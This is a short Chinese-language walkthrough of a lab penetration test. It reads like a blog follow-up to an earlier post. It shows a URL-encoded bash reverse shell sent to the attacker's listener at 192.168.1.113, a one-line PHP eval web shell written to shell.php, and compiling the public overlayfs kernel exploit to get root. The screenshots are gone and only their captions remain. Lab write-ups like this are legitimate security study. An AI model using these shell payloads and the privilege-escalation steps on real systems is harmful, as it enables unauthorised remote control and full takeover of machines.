这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟
上面一篇文章开始。
开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash
需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象,
编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%2e%31%31%33%2f%34%33%32%31%20%30%3e%26%31%22%20%7c%20%62%61%73%68
kali开启监听:
传入命令:
成功get:
查看靶机版本信息:
发现linux版本:Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
这个版本有本地权限提升的exp可以使用。附上连接:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit
下载完后,还需要进行exp文件上传。这里的图片马用菜刀是没法连接的。所以需要重新写入马子:
echo '<?php eval($_POST['shell']);?>' >> shell.php
写入成功,进行连接。
上传完成后。对exp进行赋权。
进行编译:
gcc 文件名.c -o 编译后的文件名
运行: ./编译后的文件名
提权成功查看权限和当前用户:
到此结束,重点就是nc监听哪一步,老实弹不回来。